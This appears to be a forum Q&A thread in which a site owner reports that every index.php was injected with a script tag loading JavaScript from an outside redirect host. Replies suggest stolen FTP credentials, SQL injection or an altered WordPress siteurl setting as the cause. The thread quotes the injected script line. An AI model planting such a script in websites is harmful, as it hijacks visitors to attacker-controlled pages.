# Site hacked - looking for prevention tips

Tags: javascript, php, filezilla

I have a site that I am working on that I uploaded to my server two nights ago to check performance of a couple of heavy queries. I looked again tonight to work on one that was causing a timeout and the page was redirected to an external site.

When I checked, each index.php within the site had `<script type='text/javascript' async src='https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000'></script>` at the top.

I have removed them now but, want to prevent it happening again. I will obviously do the obvious things such as changing my FTP password but is there anything else I can look into?

My only theory is that they have access to my account or FTP settings so will get those passwords changed. However, I do use Filezilla and found something that suggested PC viruses exist that can rip the account details from it. I have run a virus check and that is all clear.

Other than changing my passwords, is there anything else I should be looking at?

Comment: I would look if anywhere in the PHP code there was a possibility of SQL injection.

Comment: If you suspect that the issue has occurred due to your ftp credentials being stolen, your first port of call is to try and narrow down exactly HOW this happened. Did you try to login from any extra sources or devices that weren't under your control? Did you share the login details with anyone? You might find it better to post this question to the Information Security SE instead of here as you seem to believe this is a security breach instead of your own programming issue opening an exploit?

Comment: Doug - there is only a login form on the site and no $_GET based or visible queries. All the queries aside from logging in (which is only me) are SELECTS called from models in an MVC structure. If that could still be vulnerable I will take a look.

Comment: Tom - I will post it over there. Just to answer though, I uploaded the changes through Filezilla and the last time I uploaded anything was about six months ago from the same PC. I have not been anywhere near it in the meantime and have not shared the login details with anyone. I am not ruling out it being something in my code but it is a very minimal site at the moment and cannot think where it might be.

Comment: If the PHP code was modified, it's certainly your FTP or SSH (if you have one) credentials that were stolen, it can't be an exploit of your code (only if you have code that modifies your PHP files, but I doubt you did that)

Comment: Are u using Wordpress ? and Woocommerce ? older version?

Answer (score 0):

A client of mine had exactly the same issue. This hack has changed the wp_options with option name "siteurl" to "https://somelandingpage.com/3gGykjDJ?frm=", so Wordpress redirects user to this url!

[image]

Comment: How to prevent this